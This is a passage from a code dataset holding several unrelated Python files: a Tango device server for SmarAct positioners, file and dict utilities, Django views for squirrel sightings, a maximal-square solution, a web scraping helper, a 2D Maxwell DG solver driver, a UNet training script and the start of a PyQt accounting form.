\"\"\" Initialize dynamic attributes\n \"\"\"\n pass\n\n def command_allowed(self, attr=None):\n \"\"\" Check device state\n \"\"\"\n if self.get_state() == PT.DevState.FAULT:\n if attr is None:\n PT.Except.throw_exception(\"Fault state\", \"Command not allowed because device is in fault state\", \"SmarActPositioner::command_allowed()\")\n else:\n return False\n else:\n return True\n\n def ConvertPosition(self, value):\n return float(value) * self._conv_factor\n\n def ConvertVelocity(self, value):\n return float(value) * self._conv_factor\n\n def ConvertAcceleration(self, value):\n return float(value) * self._conv_factor\n\n @PTS.command(dtype_in=None, doc_in='', dtype_out=None, doc_out='')\n def Stop(self):\n \"\"\" Stop movement\n \"\"\"\n self.command_allowed()\n self.dev.Stop(self.axis)\n\n @PTS.command(dtype_in=None, doc_in='', dtype_out=None, doc_out='')\n def Calibrate(self):\n \"\"\" Calibration routine\n \"\"\"\n self.command_allowed()\n self.debug_stream(\"Starting calibration\")\n try:\n # Check calibration options\n opt = CalibrationOptions(self.dev.GetCalibrationOptions(self.axis))\n self.debug_stream(\"Current calibration options: {0:d}\".format(opt.getValue()))\n\n ref = SensorType(self.dev.GetSensorReferenceType(self.axis))\n self.debug_stream(\"Reference type: {0:d}\".format(opt.getValue()))\n\n # Check if positioner has multiple reference mark\n if ref.isDistanceCoded():\n opt.setDetectCodeInversion(True)\n else:\n opt.setDetectCodeInversion(False)\n\n # Enable advanced sensor correction\n # TODO: should check that the positioner is Stick-Slip Piezo\n opt.setAdvancedSensorCorrection(True)\n self.debug_stream(\"New calibration options: {0:d}\".format(opt.getValue()))\n self.dev.SetCalibrationOptions(np.array([self.axis, opt.getValue()], dtype=np.int32))\n\n # Start calibration\n self.dev.Calibrate(self.axis)\n\n except PT.DevFailed as e:\n self.error_stream(\"Calibration failed (Error: {0!s})\".format(e.args[0].desc))\n PT.Except.re_throw_exception(e, \"Calibration failed\", \"Cablibration failed\", \"SmarActPositioner::Calibrate()\")\n except Exception as e:\n self.error_stream(\"Calibration failed (Error: {0!s})\".format(e))\n PT.Except.throw_exception(e, \"Calibration failed\", \"Cablibration failed (Error: {0!s})\".format(e), \"SmarActPositioner::Calibrate()\")\n\n @PTS.command(dtype_in=None, doc_in='', dtype_out=None, doc_out='')\n def Reference(self):\n \"\"\" Referencing routine\n \"\"\"\n self.command_allowed()\n self.debug_stream(\"Booking reference move\")\n self._do_reference = True\n\n def DoReference(self):\n # Check referencing options\n try:\n # Relative move before referencing\n if self.ref_movebefore != 0.0:\n pos = self.dev.GetPosition(self.axis)\n new_pos = pos + int(self.ref_movebefore / self._conv_factor)\n self.dev.Move(np.array([self.axis, new_pos], np.int64))\n self.waitForMotionDone()\n\n opt = ReferencingOptions(self.dev.GetReferencingOptions(self.axis))\n ref = SensorType(self.dev.GetSensorReferenceType(self.axis))\n self.debug_stream(\"Reference type: {0:d}\".format(ref.getValue()))\n\n # Check if we have to reverse reference direction\n opt.setStartDirection(self.ref_reverse)\n\n # If the positioners has multiple references distance-coded set inversion after first reference to reduce movement\n if ref.isDistanceCoded():\n opt.setReverseDirection(True)\n else:\n opt.setReverseDirection(False)\n\n self.dev.SetReferencingOptions(np.array([self.axis, opt.getValue()], dtype=np.int32))\n self.debug_stream(\"Referencing options: {0:d}\".format(opt.getValue()))\n\n # Start referencing\n self.dev.Reference(self.axis)\n self.waitForMotionDone()\n\n except PT.DevFailed as e:\n self.error_stream(\"Referencing failed (Error: {0!s})\".format(e.args[0].desc))\n except Exception as e:\n self.error_stream(\"Referencing failed (Error: {0!s})\".format(e))\n\n self._do_reference = False\n\n def waitForMotionDone(self):\n while True:\n time.sleep(0.2)\n st = AxisState(self.dev.AxisState(self.axis))\n if st.is_moving() or st.is_calibrating() or st.is_referencing():\n continue\n else:\n break\n\n def PollingThread(self):\n\n self.debug_stream(\"Polling thread started\")\n polling = float(self.polling) / 1000.0\n\n count = 0\n while not self._terminate:\n s = time.time()\n\n if self.get_state() != PT.DevState.FAULT:\n # Poll only if state is not FAULT\n\n # Handle referencing\n if self._do_reference:\n self.DoReference()\n\n # Poll state\n try:\n st = AxisState(self.dev.AxisState(self.axis))\n\n if self.get_logger().is_debug_enabled():\n self.debug_stream(\"Polled state: {0:d} ({1!s})\".format(st.getValue(), st))\n\n new_state = None\n if st.is_moving() or st.is_calibrating() or st.is_referencing():\n if self._mdone:\n self._mdone = False\n self.push_change_event(\"MotionDone\", self._mdone)\n new_state = PT.DevState.MOVING\n\n else:\n if not self._mdone:\n self._mdone = True\n self.push_change_event(\"MotionDone\", self._mdone)\n new_state = PT.DevState.STANDBY\n\n if st.move_failed():\n new_state = PT.DevState.FAULT\n err_code = self.dev.GetLastError(self.axis)\n self.error_stream(\"Move failed with error: {0:d}\".format(err_code))\n\n elif st.over_temperature():\n new_state = PT.DevState.ALARM\n\n self.set_state(new_state)\n\n if self._iscal != st.is_calibrated():\n self._iscal = st.is_calibrated()\n self.push_change_event(\"IsCalibrated\", self._iscal)\n\n if self._isref != st.is_referenced():\n self._isref = st.is_referenced()\n self.push_change_event(\"IsReferenced\", self._isref)\n\n # Poll postion\n pos = self.dev.GetPosition(self.axis) * self._conv_factor\n\n if self.get_logger().is_debug_enabled():\n self.debug_stream(\"Polled position: {0:.3f}\".format(pos))\n\n if pos != self._pos:\n self._pos = pos\n self.push_change_event(\"Position\", self._pos)\n\n except PT.DevFailed as e:\n self.error_stream(\"Device polling failed. Errors:\")\n for i in range(len(e.args)):\n self.error_stream(\"[{0:d}] {1!s} ({2!s})\".format(i, e.args[i].desc, e.args[i].origin))\n\n else:\n if count > 10:\n count = 0\n # Try to reconnect to device\n try:\n self.initialize_device()\n self.set_state(PT.DevState.STANDBY)\n except PT.DevFailed:\n self.error_stream(\"Failed to reconnect with device\")\n else:\n count += 1\n\n elapsed = time.time() - s\n if(elapsed < polling):\n time.sleep(polling - elapsed)\n\n @PTS.attribute(name=\"Position\", label=\"Position\", dtype=PT.DevDouble, doc=\"Axis position\")\n def Position(self):\n return self._pos\n\n @Position.write\n def wPosition(self, value):\n self.debug_stream(\"Write Position: {0:f}\".format(value))\n\n # Convert position to device units\n pos = int(value / self._conv_factor)\n\n # Start move\n self.dev.Move(np.array([self.axis, pos], np.int64))\n self.set_state(PT.DevState.MOVING)\n\n def is_Position_allowed(self, attr):\n general = self.command_allowed(attr)\n if not general:\n return False\n if general and attr != PT.AttReqType.READ_REQ and self.get_state() != PT.DevState.STANDBY:\n return False\n else:\n return True\n\n @PTS.attribute(name=\"Velocity\", label=\"Velocity\", dtype=PT.DevDouble, format=\"%.2f\", unit=\"um/s\", doc=\"Axis velocity\", fisallowed='command_allowed')\n def Velocity(self):\n return self._vel\n\n @Velocity.write\n def wVelocity(self, value):\n self.debug_stream(\"Write velocity {0!s}\".format(value))\n\n if value == self._vel:\n return\n\n # Convert velocity to device unit\n vel = int(value / self._conv_factor)\n\n # Write velocity to device\n self.dev.SetVelocity(np.array([self.axis, vel], dtype=np.int64))\n\n time.sleep(0.1)\n\n # Check written value\n new_vel = self.dev.GetVelocity(self.axis)\n\n if new_vel != vel:\n self.error_stream(\"Failed to set velocity (set={0:d}, actual={1:d})\".format(vel, new_vel))\n PT.Except.throw_exception(\"Failed to set velocity (set={0:d}, actual={1:d})\".format(vel, new_vel))\n\n # Push change event\n self._vel = value\n self.push_change_event(\"Velocity\", self._vel)\n\n @PTS.attribute(name=\"Acceleration\", label=\"Acceleration\", dtype=PT.DevDouble, format=\"%.2f\", unit=\"um/s^2\", doc=\"Axis acceleration\", fisallowed='command_allowed')\n def Acceleration(self):\n return self._acc\n\n @Acceleration.write\n def wAcceleration(self, value):\n self.debug_stream(\"Write acceleration {0!s}\".format(value))\n\n if value == self._acc:\n return\n\n # Convert velocity to device unit\n acc = int(value / self._conv_factor)\n\n # Write velocity to device\n self.dev.SetAcceleration(np.array([self.axis, acc], dtype=np.int64))\n\n time.sleep(0.1)\n\n # Check written value\n new_acc = self.dev.GetAcceleration(self.axis)\n\n if new_acc != acc:\n self.error_stream(\"Failed to set acceleration (set={0:d}, actual={1:d})\".format(acc, new_acc))\n PT.Except.throw_exception(\"Failed to set acceleration (set={0:d}, actual={1:d})\".format(acc, new_acc))\n\n # Push change event\n self._acc = value\n self.push_change_event(\"Acceleration\", self._acc)\n\n @PTS.attribute(name=\"MotionDone\", label=\"Motion done\", dtype=PT.DevBoolean, doc=\"Motion done\", fisallowed='command_allowed')\n def MotionDone(self):\n return self._mdone\n\n @PTS.attribute(name=\"IsReferenced\", label=\"Is referenced\", dtype=PT.DevBoolean, doc=\"Axis is referenced\", fisallowed='command_allowed')\n def IsReferenced(self):\n return self._isref\n\n @PTS.attribute(name=\"IsCalibrated\", label=\"Is calibrated\", dtype=PT.DevBoolean, doc=\"Axis is calibrated\", fisallowed='command_allowed')\n def IsCalibrated(self):\n return self._iscal\n\n\nif __name__ == \"__main__\":\n # Start device server\n try:\n PTS.run((SmarActPositioner, ))\n except PT.DevFailed as e:\n print(\"Tango exception: {:}\".format(e.args[0].desc))\n except Exception as e:\n print(\"Python exception: {:}\".format(repr(e)))\n except str as e:\n print(\"String exception: {:}\".format(e))\n","repo_name":"udyni/tango","sub_path":"SmarActController/SmarActPositioner.py","file_name":"SmarActPositioner.py","file_ext":"py","file_size_in_byte":18227,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20884558682","text":"from typing import List, Optional, OrderedDict\nfrom os.path import isdir, isfile, join\nimport re\nimport os\nimport json\nimport string\nimport yaml\nimport random\nfrom typing import Union\n\ndef read_json(json_filepath):\n with open(json_filepath, \"r\") as fd:\n return json.load(fd)\n\ndef read_yaml(file: str):\n with open(file) as fd:\n return yaml.safe_load(fd)\n\ndef write_yaml(data, file):\n with open(file, \"w\") as fd:\n return yaml.safe_dump(data, fd)\n\n\ndef write_json(data, file):\n with open(file, \"w\") as fd:\n return json.dump(data, fd, separators=(\",\", \":\"))\n\ndef randstr(len: int = 32):\n return \"\".join(random.choice(string.ascii_letters + string.digits) for _ in range(len))\n\ndef randsubdirs(rootdir: str, len= 0, baselen=0):\n return [join(rootdir, randstr(baselen)) for _ in range(len)]\n\ndef listdirs(rootdir: str):\n try:\n return [dir for dir in os.listdir(rootdir) if isdir(join(rootdir, dir))]\n except FileNotFoundError:\n return []\n\n\ndef listfiles(rootdir: str):\n try:\n return [file for file in os.listdir(rootdir) if isfile(join(rootdir, file))]\n except FileNotFoundError:\n return []\n\n\n\n\ndef makenumberedsubdirs(rootdir: str, t: int, f: int = 1, override_names: bool = False):\n subdirs = listdirs(rootdir)\n offset = 0\n if not override_names and len(subdirs) > 0:\n num_dirs = sorted([dir for dir in subdirs if dir.isdigit()], reverse=True)\n if len(num_dirs) > 0:\n offset = int(num_dirs[0])\n\n return [join(rootdir, str(dir)) for dir in range(offset + f, offset + t + f)]\n\ndef dictList2ListDict(dictlist: dict):\n list_dict, dictlist_idxs = [], {k:0 for k, v in dictlist.items() if type(v) == list}\n done = False\n while not done:\n d = {}\n for k, v in dictlist.items():\n d[k] = v if type(v) != list else v[dictlist_idxs[k]]\n\n for idx ,k in enumerate(dictlist_idxs.keys()):\n if idx != (len(dictlist_idxs) - 1):\n if dictlist_idxs[k] == (len(dictlist[k]) - 1):\n dictlist_idxs[k] = 0\n else:\n dictlist_idxs[k] += 1\n break\n elif idx == (len(dictlist_idxs) - 1):\n if dictlist_idxs[k] == (len(dictlist[k]) - 1):\n done = True\n else:\n dictlist_idxs[k] += 1\n break\n list_dict.append(d)\n if len(dictlist_idxs) == 0:\n break\n return list_dict\n\n\ndef rawparse_args(rawoptions: str):\n matches = re.findall(r'(?:--?)([\\w-]+)(.*?)(?= -|$)', rawoptions)\n result = {}\n for m in matches:\n val: str = m[1].strip()\n if val.isdigit() and float(val) == int(val):\n result[m[0]] = True if not m[1] else int(val)\n elif val.isdigit():\n result[m[0]] = True if not m[1] else float(val)\n else:\n result[m[0]] = True if not m[1] else val\n return result\n\ndef dictargs2str(dictargs: OrderedDict) -> str:\n cmd = \"\"\n for argname, argval in dictargs.items():\n if type(argval) == bool:\n options = \" --{argname}\" if argval == True else \"\"\n elif type(argval) == list:\n options = f\" --{argname} {','.join(argval)}\"\n else:\n options = f\" --{argname} {argval}\"\n cmd += options\n return cmd\n\ndef append_basename(dirs: list[str], base: str):\n return [join(dir, base) for dir in dirs]\n\n\ndef prepend_dir(dirs: list[str], dirname: str):\n return [join(dirname, dir) for dir in dirs]\n\ndef get_subdirs(rootdir: str, filter=Optional[str], to_exclude = [], custom_filter=None):\n if filter == \"folder\":\n subdirs = [subdir for subdir in listdirs(rootdir) if (not subdir in to_exclude)]\n\n elif filter == \"file\":\n subdirs = [subdir for subdir in listfiles(rootdir) if (not subdir in to_exclude)]\n\n elif filter == \"custom\" and custom_filter:\n try:\n subdirs = [subdir for subdir in os.listdir(rootdir) if (not subdir in to_exclude) and custom_filter(subdir)]\n except FileNotFoundError:\n subdirs = []\n\n else:\n try:\n subdirs = [subdir for subdir in os.listdir(rootdir) if (not subdir in to_exclude)]\n except FileNotFoundError:\n subdirs = []\n\n subdirs.sort(key=lambda x: os.stat(join(rootdir, x)).st_ctime, reverse=True)\n return subdirs\n\ndef maplist(array: list, fun):\n return [fun(it) for it in array]\n\ndef runlist(array: list, fun):\n for item in array:\n fun(item)\n\ndef maplistindex(array: list, fun):\n return [fun(indx, item) for indx, item in enumerate(array)]\n\ndef get_valdicts(dicts: list[dict], key: str):\n return [d[key] for d in dicts]\n","repo_name":"lakhalouahid/torch-utils","sub_path":"src/torch_utils/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28550359139","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n# Create your views here\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.forms import ModelForm\nimport random\nfrom django.db.models import Sum, Count\n\nfrom .models import Sighting\n\nclass SightingForm(ModelForm):\n class Meta:\n model = Sighting\n fields = '__all__'\n\ndef sighting_list(request):\n template='sightings/list.html'\n sightings = Sighting.objects.all()\n context = {\n 'sightings' : sightings,\n }\n return render(request, template, context)\n\n\ndef sighting_add(request):\n template='sightings/add.html'\n form = SightingForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect(reverse('sighting_list'))\n return render(request, template, {'form':form})\n\ndef sighting_update(request, squirrel_id):\n template='sightings/update.html'\n sighting = get_object_or_404(Sighting, pk=squirrel_id)\n form = SightingForm(request.POST or None, instance=sighting)\n if request.method=='POST' and 'update' in request.POST:\n if form.is_valid():\n form.save()\n return redirect(reverse('sighting_list'))\n return render(request, template, {'form':form})\n\ndef sighting_stats(request):\n template = 'sightings/stats.html'\n stats_list = [\n Sighting.objects.aggregate(total_squirrels_number = Count('squirrel_id')),\n Sighting.objects.filter(age ='Adult').aggregate(Adult_number = Count('squirrel_id')),\n Sighting.objects.filter(age ='Juvenile').aggregate(Juvenile_num = Count('squirrel_id')),\n Sighting.objects.filter(fur_color='Gray').aggregate(Gray_number = Count('squirrel_id')),\n Sighting.objects.filter(running ='True').aggregate(Running__number = Count('squirrel_id')),\n ]\n sighting_list=[]\n for sighting in stats_list:\n sighting_list.append([list(sighting.keys())[0],list(sighting.values())[0]])\n context = {'stats':sighting_list,}\n return render(request, template, context)\n","repo_name":"QikangSong/Squirrel-Tracker","sub_path":"mysite/sightings/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2743454158","text":"class Solution:\n def maximalSquare(self, matrix):\n if not matrix or not matrix[0]:\n return 0\n # print(\"Hello\")\n m = len(matrix)\n n = len(matrix[0])\n for i in range(m):\n print(matrix[i])\n ans =0\n temp = [0]*n\n dp =[[0]*n for i in range(m)]\n print(temp)\n for i in range(m):\n\n dp[i][0] = int(matrix[i][0])\n for j in range(1,n):\n if matrix[i][j] == '1':\n # dont check if i=0\n dp[i][j] = 1+min(dp[i][j-1],dp[i-1][j],dp[i-1][j-1])\n ans = max(ans,max(dp[i]))\n\n print(ans**2)\n\nA = [[\"1\",\"0\",\"1\",\"0\",\"0\"],[\"1\",\"0\",\"1\",\"1\",\"1\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"1\",\"0\",\"0\",\"1\",\"0\"]]\n# print(A)\ns=Solution()\ns.maximalSquare(A)","repo_name":"nikhil3991/Problem_Solving","sub_path":"DP/Maximal Square.py","file_name":"Maximal Square.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1202285900","text":"import numpy as np\nfrom meshing_functions import MeshReaderGambit2D\nfrom node_mappings import Nodes2D, xytors, GeometricFactors2D\nfrom diff_matrices import Dmatrices2D, Vandermonde2D, GradVandermonde2D\nfrom surface_ints import Lift2D\nfrom normals import Normals2D\nfrom connectivity_maps import tiConnect2D, BuildMaps2D\nfrom Maxwell2D import Maxwell2D\n\n\ndef StartUp2D(NODETOL, N, Nv, VX, VY, K, EToV):\n\n # some important constants\n Nfp = N+1 # number of nodes on a face\n Np = int((N+1)*(N+2)/2) # number of nodes in each element\n Nfaces=3 # number of faces in each element\n \n # compute nodal set\n x_tmp, y_tmp = Nodes2D(N) # finds good interpolation points on eq tri. using warp and blend\n r, s = xytors(x_tmp,y_tmp) # maps x and y to r and s, points on the standard triangle |\n\n # create the computational components (Vandermond matrix, Mass Matrix, \n # and differention matrices\n V = Vandermonde2D(N, r, s)\n invV = np.linalg.inv(V)\n MassMatrix = invV.T*invV\n Dr, Ds = Dmatrices2D(N,r,s,V)\n\n # Build coordinates of all the nodes\n va = EToV[:, 0].T - 1 # vector of first node in each element\n vb = EToV[:, 1].T - 1 # second node in each element\n vc = EToV[:, 2].T - 1 # third node in each element\n\n # Reshape the VX and VY arrays to match the required shape\n VX = VX.reshape(-1, 1) # Shape: (146, 1)\n VY = VY.reshape(-1, 1) # Shape: (146, 1)\n\n # Affine mapping from r,s set of well-behaved interpolation points,\n # to the computational points, x and y in the physical grid\n x = 0.5 * (-(r + s) * VX[va] + (1 + r) * VX[vb] + (1 + s) * VX[vc]) # Shape: (66, 1)\n y = 0.5 * (-(r + s) * VY[va] + (1 + r) * VY[vb] + (1 + s) * VY[vc]) # Shape: (66, 1)\n x = x.T\n y = y.T\n\n # Find all the nodes that lie on each edge\n # this is needed to calculate the surface integral\n fmask1 = np.where(np.abs(s+1) < NODETOL)[0]\n fmask2 = np.where(np.abs(r+s) < NODETOL)[0]\n fmask3 = np.where(np.abs(r+1) < NODETOL)[0]\n Fmask = np.concatenate((fmask1, fmask2, fmask3)).T\n Fx = x[Fmask, :]\n Fy = y[Fmask, :]\n\n # change the form of Fmask to work with later arrays\n Fmask = np.column_stack((fmask1, fmask2, fmask3))\n\n # Create surface integral terms\n # allows the computation of the surface integral on the faces of the \n # element and the subsequent incorporation of that information into the \n # overall solution within the element.\n LIFT = Lift2D(N, Np, Nfaces, Nfp, r, s, Fmask, V)\n\n # calculate geometric factors\n # nx(i,k) is the n^{hat} component of normal at face noide i on element k\n # J = Volume Jacobian\n # sJ = Jacobian at surface nodes\n # Fscale(i,k) = ratio of surface to volume Jacobian of face i on element k\n rx, sx, ry, sy, J = GeometricFactors2D(x, y, Dr, Ds) # metric constants\n nx, ny, sJ = Normals2D(K, Nfp, x, y, Dr, Ds, Fmask)\n Fscale = sJ / J[Fmask.flatten()]\n\n # build connectivity matrix\n EToE, EToF = tiConnect2D(EToV)\n\n # build connectivity maps\n mapM, mapP, vmapM, vmapP, vmapB, mapB = BuildMaps2D(NODETOL, K, Np, Nfp, Nfaces, Fmask, EToV, EToE, EToF, VX, VY, x, y)\n Vr, Vs = GradVandermonde2D(N, r, s)\n Drw = np.dot(np.dot(V, Vr.T), np.linalg.inv(np.dot(V, V.T)))\n Dsw = np.dot(np.dot(V, Vs.T), np.linalg.inv(np.dot(V, V.T)))\n\n return Np, Nfp, Nfaces, K, vmapM, vmapP, vmapB, mapB, x, y, r, s, nx, ny, rx, sx, ry, sy, Dr, Ds, LIFT, Fscale\n\nif __name__ == \"__main__\":\n N = 10 # polynomial order used for approximation\n NODETOL = 1e-12 # used to find nodes on the edge\n \n # read in mesh from file\n Nv, VX, VY, K, EToV = MeshReaderGambit2D('Maxwell025.neu')\n\n # run startup script to find all computational elements needed for the time loop\n Np, Nfp, Nfaces, K, vmapM, vmapP, vmapB, mapB, x, y, r, s, nx, ny, rx, sx, ry, sy, Dr, Ds, LIFT, Fscale = StartUp2D(NODETOL, N, Nv, VX, VY, K, EToV)\n\n # set initial conditions\n mmode = 1\n nmode = 1\n Ez = np.sin(mmode * np.pi * x) * np.sin(nmode * np.pi * y)\n Hx = np.zeros((Np, K))\n Hy = np.zeros((Np, K))\n\n # solve problem\n FinalTime = 1\n Hx,Hy,Ez,time = Maxwell2D(NODETOL, N, Np, Nfp, Nfaces, vmapM, vmapP, vmapB, mapB, K, x, y, r, s, nx, ny, Hx, Hy, Ez, FinalTime, Dr, Ds, rx, ry, sx, sy, LIFT, Fscale)\n","repo_name":"lukebodm/EM_nodal_DG","sub_path":"MaxwellDriver2D.py","file_name":"MaxwellDriver2D.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42941084483","text":"\"\"\"\nGet value by url path\n\n__author__: ShadMod\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nfrom requests import get as requests_get\n\n\"\"\"\ne.g.\n\nclean = [\"<p>\", \"</p>\"]\npathurl = []\nfor url in pathurl:\n scrape_text(url, \"div\", class_=\"mw-parser-output\", tag=\"p\", clean=clean)\n\"\"\"\n\n\ndef scrape_text(\n url, content, id_=None, class_=None, name_=None, tag=None, clean=False, content_nr: int = 0,\n ret_type: str = \"str\",\n):\n \"\"\"\n content => str: tag that conțains the desired values (big container)\n (e.g. div, span, table, ...)\n id_ => tag id\n class_ => tag class\n name_ => tag name\n tag => str: tag to filter all html tag (detailed container)\n (e.g. div, span, table, p, ...)\n clean => str or list of value to be removed\n \"\"\"\n\n # get page html by url and take soup parser\n page = requests_get(url)\n soup = BeautifulSoup(page.text, \"html.parser\")\n\n # set attrs dict\n attrs = {}\n if id_:\n attrs[\"id\"] = id_\n if class_:\n attrs[\"class\"] = class_\n if name_:\n attrs[\"name\"] = name_\n\n if content and attrs and tag:\n # find all with params ad take tag decided like string\n soup_container = soup.findAll(content, attrs=attrs)\n soup_tag = str(getattr(soup_container[content_nr], tag))\n\n if clean:\n text = soup_tag\n for key_tag in clean:\n text = text.replace(key_tag, \"\")\n return text\n else:\n return soup_tag\n\n if ret_type == \"str\":\n return str(soup.findAll(tag, attrs=attrs))\n elif ret_type == \"list\":\n return list(soup.findAll(tag, attrs=attrs))\n else:\n return str(soup.findAll(tag, attrs=attrs))\n","repo_name":"shadMod/python_scrape","sub_path":"bin/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21701471336","text":"from torch.utils.data import DataLoader\nfrom collections import OrderedDict\nfrom collections import namedtuple\nfrom itertools import product\nimport time\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch.utils.tensorboard import SummaryWriter\nimport pandas as pd\nfrom torch.nn import DataParallel\n\nfrom UNet_full_network import *\nfrom datainporter import *\n\nism_folder = 'ISM_Train'\nconf_folder = 'Conf_Train'\n\n\nclass RunBuilder():\n @staticmethod\n def get_runs(params):\n Run = namedtuple('Run', params.keys())\n\n runs = []\n for v in product(*params.values()):\n runs.append(Run(*v))\n\n return runs\n\n\nclass RunManager():\n\n def __init__(self):\n self.epoch_count = 0\n self.epoch_loss = 0\n self.epoch_acc = 0\n self.epoch_start_time = None\n\n self.run_params = None\n self.run_count = 0\n self.run_data = []\n self.run_start_time = None\n\n self.network = None\n self.loader = None\n\n def begin_run(self, run, network, loader):\n self.run_start_time = time.time()\n\n self.run_params = run\n self.run_count += 1\n\n self.network = network\n self.loader = loader\n self.tb = SummaryWriter(comment=f'-{run}')\n\n def end_run(self):\n self.tb.close()\n self.epoch_count = 0\n\n def begin_epoch(self):\n self.epoch_start_time = time.time()\n\n self.epoch_count += 1\n self.epoch_loss = 0\n self.epoch_acc = 0\n\n def end_epoch(self):\n epoch_duration = time.time() - self.epoch_start_time\n run_duration = time.time() - self.run_start_time\n\n loss = self.epoch_loss\n acc = self.epoch_acc/dataset_size\n self.tb.add_scalar('Loss', loss, self.epoch_count)\n self.tb.add_scalar('Epoch time', epoch_duration, self.epoch_count)\n self.tb.add_scalar('Accuracy', acc, self.epoch_count)\n for name, param in self.network.named_parameters():\n self.tb.add_histogram(name, param, self.epoch_count)\n self.tb.add_histogram(f'{name}.grad', param.grad, self.epoch_count)\n\n results = OrderedDict()\n results[\"run\"] = self.run_count\n results[\"epoch\"] = self.epoch_count\n results['loss'] = loss\n results['accuracy'] = acc\n results['epoch duration'] = epoch_duration\n results['run duration'] = run_duration\n for k, v in self.run_params._asdict().items(): results[k] = v\n self.run_data.append(results)\n\n # df = pd.DataFrame.from_dict(self.run_data, orient='columns')\n # print(df)\n\n def track_loss(self, loss):\n self.epoch_loss += loss.item() * self.loader.batch_size\n\n def track_acc(self, acc):\n self.epoch_acc += acc\n\n\ndef correct(outputs, mask):\n outputs = outputs > 0.9\n hold = np.logical_and(outputs, mask)\n return (hold.sum().numpy())\n\n\ndataset = superdata(conf_folder, ism_folder, 6, 3)\nvalidation_split = 0\nepochs = 5000\n\ndataset_size = dataset.__len__()\nindices = list(range(dataset_size))\nsplit = int(np.floor(validation_split * dataset_size))\ntrain_indices, val_indices = indices[split:], indices[:split]\ntrain_sampler = SubsetRandomSampler(train_indices)\nval_sampler = SubsetRandomSampler(val_indices)\n\nparams = OrderedDict(lr=[0.1], batch_size=[1], momentum=[0.99], criterion=[nn.MSELoss()])\nm = RunManager()\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nfor run in RunBuilder.get_runs(params):\n network = UNet(n_channels=1, n_classes=1)\n network = network.to(device)\n train_loader = DataLoader(dataset, batch_size=run.batch_size, shuffle=False, sampler=train_sampler)\n val_loader = DataLoader(dataset, batch_size=run.batch_size, shuffle=False, sampler=val_sampler)\n\n\n criterion = run.criterion\n\n optimiser = torch.optim.SGD(network.parameters(), lr=run.lr, momentum=run.momentum)\n\n m.begin_run(run, network, train_loader)\n for epoch in range(epochs):\n m.begin_epoch()\n for batch in train_loader:\n images, masks = batch\n images = images.to(device=device, dtype=torch.float32)\n mask_type = torch.float32 if network.n_classes == 1 else torch.long\n masks = masks.to(device=device, dtype=mask_type)\n images = images.unsqueeze(1)\n masks = masks.unsqueeze(1)\n\n pred = network(images)\n\n loss = criterion(pred, masks)\n acc = accuracy(pred,masks,0.05)[0]\n m.track_loss(loss)\n m.track_acc(acc)\n optimiser.zero_grad()\n loss.mean().backward()\n optimiser.step()\n\n # \"\"\" Save model when training has optimised it\"\"\"\n if epoch + 1 in [100,200,300,500,750,1000,2000,3000,4000,5000]:\n torch.save(network.state_dict(),\n 'UNet_lr{}_bs{}_mom{}_epoch{}.pth'.format(run.lr, run.batch_size, run.momentum, epoch))\n\n # \"\"\"Code for validation\"\"\"\n # total_loss_val = 0\n # for val_batch in val_loader:\n # val_images, val_masks = val_batch\n # val_images = val_images.to(device=device, dtype=torch.float32)\n # val_masks = val_masks.to(device=device, dtype=mask_type)\n # val_images = val_images.unsqueeze(1)\n # val_masks = val_masks.unsqueeze(1)\n # val_pred = network(val_images)\n # val_loss = criterion(val_pred, val_masks)\n # total_loss_val += val_loss.item()\n # print(\"lr:\", run.lr, \" epoch:\", epoch + 1, \" avg loss:\", total_loss_val / split)\n\n m.end_epoch()\n m.end_run()\n\n\n\n# mask_new = masks.to(device='cpu')\n# mask_new = mask_new.squeeze()\n# mask_new = mask_new.squeeze()\n# mask_new = mask_new.detach().numpy()\n# np.save('mask', mask_new)\n# temp = outputs.cpu()\n# temp = temp.detach().numpy()\n# np.save('output', temp)\n","repo_name":"Jonathan-07/UNet","sub_path":"UNet_training.py","file_name":"UNet_training.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73938690704","text":"import sys\nfrom PyQt5.QtWidgets import QApplication,QDialog,QMessageBox, QTableWidgetItem,QWidget\nfrom PyQt5 import uic\nfrom form_balancear_asiento import Ui_form_balancear_asiento\nfrom PyQt5.QtCore import pyqtRemoveInputHook\nfrom E_asiento import E_asiento\nfrom E_cliente import E_cliente\nfrom E_ejercicio import E_ejercicio\n\n\n\nclass balancear_asiento(QWidget):\n obj_form = Ui_form_balancear_asiento()\n obj_cliente = \"\"\n lista_ejercicio=\"\"\n\n\n def __init__(self):\n QDialog.__init__(self)\n self.obj_form.setupUi(self)\n self.obj_form.btn_buscar.clicked.connect(self.buscar)\n self.obj_form.btn_calcular_asientos.clicked.connect(self.calcular)\n\n def limpiar(self):\n self.obj_cliente =\"\"\n\n\n def calcular(self):\n obj_ejercicio = \"\"\n for item in self.lista_ejercicio:\n if item.descripcion == self.obj_form.cbx_ejercicio.currentText():\n obj_ejercicio=item\n obj_asiento= E_asiento()\n lst_asient_no_balanc= obj_asiento.get_asient_no_balanc(str(obj_ejercicio.id_ejercicio))\n for item in 